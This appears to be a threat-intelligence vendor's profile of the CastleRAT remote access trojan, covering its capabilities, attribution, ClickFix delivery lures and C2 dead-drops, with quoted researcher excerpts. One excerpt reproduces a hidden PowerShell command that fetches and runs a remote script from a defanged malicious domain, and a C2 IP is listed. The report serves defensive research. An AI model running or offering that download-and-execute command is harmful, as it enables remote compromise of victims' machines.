CastleRAT is a Windows remote access trojan associated primarily with the TAG-150 criminal ecosystem, later named GrayBravo, and has also been observed in operations linked to the Iranian state-sponsored group MuddyWater. First observed in 2025, it exists in both Python and compiled C variants. The malware is used as a post-compromise access and control tool in multi-stage intrusion chains and is commonly delivered by CastleLoader, though it has also appeared after other loaders and RATs in layered infections.
CastleRAT provides core remote administration capabilities including host reconnaissance, command execution through CMD and PowerShell, and download-and-execute support for additional payloads. Both variants collect system information and communicate with command-and-control infrastructure using a custom protocol with RC4 encryption. The Python variant supports remote command execution, payload retrieval, output reporting, and self-deletion. The C variant is more feature-rich and has been documented with keylogging and screen-capture functionality. Additional reporting attributes clipboard monitoring and scheduled-task persistence to CastleRAT, and some intrusions have shown the malware being used to launch browsers and proxy live browser sessions for account takeover activity.
The malware’s operators have used dead-drop resolver techniques to conceal command-and-control endpoints, including Steam Community pages and other legitimate web platforms. CastleRAT has been deployed in campaigns targeting government, defense, energy, telecommunications, logistics, and hospitality organizations, as well as victims in Israel, the broader Middle East, the United States, and Europe. It has also appeared in financially motivated campaigns that delivered secondary malware families and in espionage-linked activity where criminal malware infrastructure overlapped with state operations.
Observed delivery patterns center on social engineering rather than exploitation. CastleRAT has been distributed through ClickFix-style lures that trick victims into pasting and executing malicious PowerShell commands, including fake verification prompts, Cloudflare-themed pages, Booking.com-themed lures, and fraudulent GitHub repositories masquerading as legitimate software. In some cases it has been delivered through malicious MSI-based infection chains and through side-loading sequences embedded in larger malware operations.
CastleRAT is best characterized as a flexible RAT/backdoor used across both cybercrime and espionage contexts. Its dual-language development, evolving infrastructure, dead-drop resolution methods, and support for follow-on payload deployment make it a durable access platform within the broader GrayBravo ecosystem and a notable example of convergence between commercial malware services and state-linked intrusion activity.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
MuddyWater leveraged CastleRAT MaaS and ChainShell from the TAG-150 criminal ecosystem to target defense, energy, government, and telecommunications organizations in Israel, the Middle East, the US, and Europe.
Additionally, Insikt Group has identified a new remote access trojan linked to TAG-150, dubbed CastleRAT. Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.
...Velvet Tempest ... used a ClickFix lure ... to drop payloads like DonutLoader and CastleRAT.
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Actor attempts logins to financial-institution websites using exfiltrated browser credentials
Infections are most commonly initiated through Cloudflare-themed “ClickFix” phishing attacks or fraudulent GitHub repositories masquerading as legitimate applications.
The Blackpoint APG and SOC have been tracking a ClickFix campaign deploying the CastleLoader and CastleRAT malware... These attacks are often successful because they exploit deeply conditioned behavior, which includes completing verification steps without evaluating them.
These incidents have all included the use of finger.exe as the initial retrieval mechanism with the majority using caret (^) obfuscation on the command string.
Victims are tricked into copying and executing malicious PowerShell commands on their own devices, thereby enabling the compromise.
Available in both Python and C variants, CastleRAT's core functionality consists of collecting system information, downloading and executing additional payloads, and executing commands via CMD and PowerShell.
These incidents have all included the use of finger.exe as the initial retrieval mechanism with the majority using caret (^) obfuscation on the command string.
CastleRAT's core functionality consists of collecting system information... The following features have been implemented... Obtain and report country info of the public IP and system information
C2: 216.126.237[.]122:443 Confirmed via JA3 TLS fingerprinting and malware config extraction
Malware name: C2_10a (T1071.001) ... powershell -w h -ep b -c "iex (iwr 'biokdsl[.]com/upd' -useb).Content"
used CastleRAT to proxy the replica’s live browser session, attempting logins against financial-institution websites directly from the compromised workstation
CastleRAT is a RAT that includes C and Python variants sharing the following commonalities: Custom binary protocol using RC4 encryption with hard-coded 16-byte keys
For example, C2 deaddrops hosted on Steam Community pages is a new development, first observed in late August 2025.
The upd script downloaded and unpacked the consent.zip archive, which contained the DLL side-loading components.
23 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
29 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan offered via MaaS and used by MuddyWater against defense, energy, government, and telecommunications targets.
Remote access trojan delivered in the evolving ClickFix-style campaign previously associated with CastleLoader.
A remote access trojan referenced in relation to the reused 'Amy Cherne' code-signing certificate tied to MuddyWater and Russian cybercrime actors.
A remote access trojan offered through a Russian malware-as-a-service ecosystem and deployed in this campaign against Israeli targets.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.